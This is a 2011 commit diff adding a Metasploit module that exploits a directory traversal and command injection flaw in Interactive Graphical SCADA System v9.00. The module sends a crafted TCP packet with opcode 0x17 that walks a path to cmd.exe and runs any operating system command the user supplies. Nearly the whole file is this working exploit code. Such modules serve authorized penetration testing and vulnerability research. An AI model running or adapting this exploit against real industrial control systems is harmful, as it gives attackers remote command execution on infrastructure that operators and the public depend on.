added auxiliary module igss_exec_17.rb

git-svn-id: file:///home/svn/framework3/trunk@12077 4d416f70-5f16-0410-b530-b9f4589650da
2011-03-23 01:58:09 +00:00 · 2011-03-23 01:58:09 +00:00 · 3f7e3ee93f
parent 5274cfdc13
commit 3f7e3ee93f
1 changed files with 66 additions and 0 deletions
--- a/modules/auxiliary/admin/scada/igss_exec_17.rb
+++ b/modules/auxiliary/admin/scada/igss_exec_17.rb
@ -0,0 +1,66 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+	include Msf::Exploit::Remote::Tcp
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'Interactive Graphical SCADA System Remote Command Injection',
+			'Description'    => %q{
+					This module abuses a directory traversal flaw in Interactive
+				Graphical SCADA System v9.00. In conjunction with the traversal
+				flaw, if opcode 0x17 is sent to the dc.exe process, an attacker
+				may be able to execute arbitrary system commands.
+			},
+			'Author'         => [ 'Luigi Auriemma', 'MC' ],
+			'License'        => MSF_LICENSE,
+			'Version'        => '$Revision$',
+			'References'     =>
+				[
+					[ 'URL', 'http://aluigi.org/adv/igss_8-adv.txt' ],
+				],
+			'DisclosureDate' => 'Mar 21 2011'))
+
+		register_options(
+			[
+				Opt::RPORT(12397),
+				OptString.new('CMD', [ false, 'The OS command to execute', 'echo metasploit > %SYSTEMDRIVE%\\metasploit.txt']),
+			], self.class)
+	end
+
+	def run
+
+		connect
+
+		exec = datastore['CMD']
+
+		packet =  [0x00000100].pack('V') + [0x00000000].pack('V')
+		packet << [0x00000100].pack('V') + [0x00000017].pack('V')
+		packet << [0x00000000].pack('V') + [0x00000000].pack('V')
+		packet << [0x00000000].pack('V') + [0x00000000].pack('V')
+		packet << [0x00000000].pack('V') + [0x00000000].pack('V')
+		packet << [0x00000000].pack('V')
+		packet << "..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\"
+		packet << "windows\\system32\\cmd.exe\" /c #{exec}"
+		packet << "\x00" * (143 + exec.length)
+		
+		print_status("Sending command: #{exec}")
+		sock.put(packet)
+		sock.get_once(-1,0.5)
+		disconnect
+
+	end
+
+end